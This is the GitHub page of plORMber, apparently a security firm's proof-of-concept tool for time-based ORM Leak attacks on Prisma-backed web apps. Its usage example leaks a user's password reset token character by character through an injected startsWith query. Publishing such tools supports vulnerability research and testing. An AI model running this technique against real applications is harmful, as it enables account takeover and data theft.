Skip to content

elttam/plormber

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

1 Commit
examples
examples
 
 
plormber
plormber
 
 
CUSTOM_ATTACKS.md
CUSTOM_ATTACKS.md
 
 
Dockerfile
Dockerfile
 
 
README.md
README.md
 
 
docker-compose.yaml
docker-compose.yaml
 
 
pyproject.toml
pyproject.toml
 
 
requirements.txt
requirements.txt
 
 

Repository files navigation

plORMber

A proof-of-concept tool for exploiting ORM Leak time-based vulnerabilities. The features of this tool are currently very limited, but can be used to quickly implement a time-based ORM Leak attack.

See the accompanying blog article for an overview on how plormber works.

Feel free to fork this project for further development as long that you acknowledge elttam as the original creators.

Features

  • Time-based exploitation of prisma
  • SDK for developing ORM leak exploits

Installation

Virtual environment install

# For installing to a virtual environment
python3 -m venv venv
source venv/bin/activate

# Install plormber
pip install .

Docker install

docker compose build

Usage

Virtual environment

plormber --help

Docker

docker compose run --rm plormber --help

Prisma Example

Prisma time-based attack with payloads as arguments

plormber prisma-contains \
    --chars '0123456789abcdef' \
    --base-query-json '{"query": {PAYLOAD}}' \
    --leak-query-json '{"createdBy": {"resetToken": {"startsWith": "{ORM_LEAK}"}}}' \
    --contains-payload-json '{"body": {"contains": "{RANDOM_STRING}"}}' \
    --verbose-stats \
    https://some.vuln.app/articles/time-based;

Custom plormber Attacks

See CUSTOM_ATTACKS.md for documentation about implementing custom plormber attacks

Planned Future Features

  • More exploitation methods.
  • Burp Suite plugin

About

No description, website, or topics provided.

Resources

Readme
Activity
Custom properties

Stars

6 stars

Watchers

0 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

 
 
 

Languages